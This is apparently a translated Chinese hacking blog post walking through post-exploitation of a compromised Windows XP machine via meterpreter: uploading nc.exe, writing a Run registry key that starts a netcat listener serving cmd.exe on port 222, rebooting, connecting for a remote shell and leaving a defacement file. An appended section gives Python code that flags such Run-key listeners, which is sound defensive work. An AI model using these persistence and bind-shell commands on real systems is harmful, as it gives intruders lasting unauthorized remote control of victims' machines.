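This noob has already obtained system privileges on a machine through the latest "ping overflow" from 九区 (Dis9), so let's install NC to make the next "DIR overflow" easier. Yep!
Upload NC to C:\windows\system32\ on the target machine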
meterpreter > upload /tmp/nc.exe C:\\windows\\system32\\
[*] uploading : /tmp/nc.exe -> C:\windows\system32\
[*] uploaded : /tmp/nc.exe -> C:\windows\system32\\nc.exe
Write an autostart entry into the target machine's registry. Hmm, it should go something like this...
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v fuck -d C:\\windows\\system32\\nc.exe" -Ldp 222 -e cmd.exe"
Successful set fuck.
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v fuck
Key: HKLM\software\microsoft\windows\currentversion\Run
Name: fuck
Type: REG_SZ
Data: C:\windows\system32\nc.exe -Ldp 222 -e cmd.exe
meterpreter > reboot
Rebooting...
meterpreter >
Let's take a look: connect to the target machine with NC, and DIR!!! Am I right or what!!!
root@Dis9Team:/# cd /tmp/
root@Dis9Team:/tmp# nc 192.168.1.101 222
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\Documents and Settings\jj>dir
dir
驱动器 C 中的卷没有标签。
卷的序列号是 B015-6347
C:\Documents and Settings\jj 的目录
2011-06-23 19:57 <DIR> .
2011-06-23 19:57 <DIR> ..
2011-06-23 19:58 <DIR> Favorites
2011-06-23 19:58 <DIR> My Documents
2011-06-23 19:36 <DIR> 「开始」菜单
2011-06-23 19:36 <DIR> 桌面
0 个文件 0 字节
6 个目录 8,643,579,904 可用字节
Behold, the great hacker Helen appears~
C:\>echo "hacked by Helen" >fuck.txt
echo "hacked by Helen" >fuck.txt
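Seen from the defending side, the Run value written in the transcript is exactly what an autorun audit should surface. The following is an added example, not part of the original post: it parses `reg query` output for the Run key and flags values whose command line combines a listen flag with `-e`. The sample text is constructed and the function names are hypothetical.

```python
import re
import shlex

# Constructed `reg query` output for the Run key: the first value mirrors the
# one in the transcript, the second is a benign entry for contrast.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\Run
    fuck    REG_SZ    C:\windows\system32\nc.exe -Ldp 222 -e cmd.exe
    updater    REG_SZ    "C:\Program Files\Updater\up.exe" -silent -enable
"""

VALUE_LINE = re.compile(r"^\s+(\S.*?)\s+(REG_\w+)\s+(.*\S)\s*$")
SHORT_FLAGS = re.compile(r"^-[A-Za-z]{1,4}$")  # e.g. -e, -lp, -Ldp
SHELLS = {"cmd", "cmd.exe", "powershell", "powershell.exe"}


def parse_run_values(text):
    """Return (name, type, data) for each value line of `reg query` output."""
    return [m.groups() for m in map(VALUE_LINE.match, text.splitlines()) if m]


def listener_with_exec(data):
    """Heuristic on argument shape (not file name): listen flag plus -e."""
    try:
        tokens = shlex.split(data, posix=False)  # posix=False keeps backslashes
    except ValueError:  # unbalanced quote in the value data
        tokens = data.split()
    flags, port, program = set(), None, None
    for tok, nxt in zip(tokens[1:], tokens[2:] + [""]):
        if SHORT_FLAGS.match(tok):
            flags.update(tok[1:])  # "-Ldp" -> {"L", "d", "p"}
            if tok.endswith("p") and nxt.isdigit():
                port = int(nxt)
            if tok.endswith("e") and nxt:
                program = nxt.strip('"').split("\\")[-1].lower()
    if flags & {"l", "L"} and program:
        return {"port": port, "program": program,
                "persistent": "L" in flags, "shell": program in SHELLS}
    return None


def scan(text):
    """Return one finding per Run value that starts a listener with -e."""
    rows = ((n, d, listener_with_exec(d)) for n, _t, d in parse_run_values(text))
    return [{"value": n, "data": d, **h} for n, d, h in rows if h]


if __name__ == "__main__":
    print(scan(SAMPLE))
```

Because the match is on the arguments rather than on `nc.exe`, a renamed binary with the same command line is still reported.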
Article source: 哈客部落. Full text: http://www.hake.cc/a/anquanzhuanqu/wangzhananquan/anquanshentou/2012/1009/97652.html